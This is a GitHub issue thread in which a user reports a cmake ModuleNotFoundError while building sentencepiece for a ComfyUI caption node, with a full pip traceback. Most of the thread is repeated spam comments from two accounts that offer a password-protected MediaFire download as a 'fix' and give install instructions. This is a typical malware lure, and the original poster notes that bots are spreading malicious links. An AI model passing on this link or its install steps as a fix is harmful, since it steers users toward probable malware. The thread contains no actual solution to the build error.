### ISSUE TITLE
ModuleNotFoundError: No module named 'cmake'

### ISSUE THREAD

**Issue by mperez96** [StartHua/Comfyui_CXH_joy_caption#31]
Got this error when trying to install the node. 
![image](https://github.com/user-attachments/assets/bfdfb19e-074a-4f4c-ac69-df5ed064dd99)

As a suggestion from someone, I tried to run install_req.bat (and also tried using "python -m pip install -r requirements.txt"), but got same error:
```
(venv) PS D:\Users\USER\Documents\AI\ComfyUI\custom_nodes\Comfyui_CXH_joy_caption> python -m pip install -r requirements.txt
Requirement already satisfied: huggingface_hub==0.24.3 in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 1)) (0.24.3)
Requirement already satisfied: transformers>=4.43.3 in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 2)) (4.44.2)
Requirement already satisfied: tqdm in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 3)) (4.66.5)
Requirement already satisfied: numpy in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 4)) (1.26.4)
Requirement already satisfied: surrealist in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 5)) (0.5.3)
Requirement already satisfied: boto3==1.34.86 in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 6)) (1.34.86)
Requirement already satisfied: llama-cpp-python==0.2.89 in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 7)) (0.2.89)
Requirement already satisfied: Pillow==10.1.0 in d:\users\user\documents\ai\comfyui\venv\lib\site-packages (from -r requirements.txt (line 8)) (10.1.0)
Collecting sentencepiece==0.1.99 (from -r requirements.txt (line 9))
  Using cached sentencepiece-0.1.99.tar.gz (2.6 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error

  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [27 lines of output]
      Traceback (most recent call last):
        File "<frozen runpy>", line 198, in _run_module_as_main
        File "<frozen runpy>", line 88, in _run_code
        File "D:\Users\USER\Documents\AI\ComfyUI\venv\Scripts\cmake.exe\__main__.py", line 4, in <module>
      ModuleNotFoundError: No module named 'cmake'
      Traceback (most recent call last):
        File "D:\Users\USER\Documents\AI\ComfyUI\venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 353, in <module>
          main()
        File "D:\Users\USER\Documents\AI\ComfyUI\venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "D:\Users\USER\Documents\AI\ComfyUI\venv\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 118, in get_requires_for_build_wheel
          return hook(config_settings)
                 ^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\USER\AppData\Local\Temp\pip-build-env-embn7g31\overlay\Lib\site-packages\setuptools\build_meta.py", line 332, in get_requires_for_build_wheel
          return self._get_build_requires(config_settings, requirements=[])
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "C:\Users\USER\AppData\Local\Temp\pip-build-env-embn7g31\overlay\Lib\site-packages\setuptools\build_meta.py", line 302, in _get_build_requires
          self.run_setup()
        File "C:\Users\USER\AppData\Local\Temp\pip-build-env-embn7g31\overlay\Lib\site-packages\setuptools\build_meta.py", line 503, in run_setup
          super().run_setup(setup_script=setup_script)
        File "C:\Users\USER\AppData\Local\Temp\pip-build-env-embn7g31\overlay\Lib\site-packages\setuptools\build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 126, in <module>
        File "C:\Python312\Lib\subprocess.py", line 413, in check_call
          raise CalledProcessError(retcode, cmd)
      subprocess.CalledProcessError: Command '['cmake', 'sentencepiece', '-A', 'x64', '-B', 'build', '-DSPM_ENABLE_SHARED=OFF', '-DCMAKE_INSTALL_PREFIX=build\\root']' returned non-zero exit status 1.
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.
```

I previously had comfy ui installed without an venv but wanted to see if making one could solve the problem but still happened.
This is the version installed I have of cmake:
![image](https://github.com/user-attachments/assets/6ac6d19c-1d4a-4da7-b411-773fc0edae18)

When tried to download the sentencepiece manually, this is what I got:
![image](https://github.com/user-attachments/assets/6590e834-fa68-4efc-932a-de92f3bf192e)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mperez96** [comment]
my python version is "Python 3.12.5", can't find which version I need in order to download "sentencepiece==0.1.99"

PS: First time I see bots spreading malicious links at github 😢

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
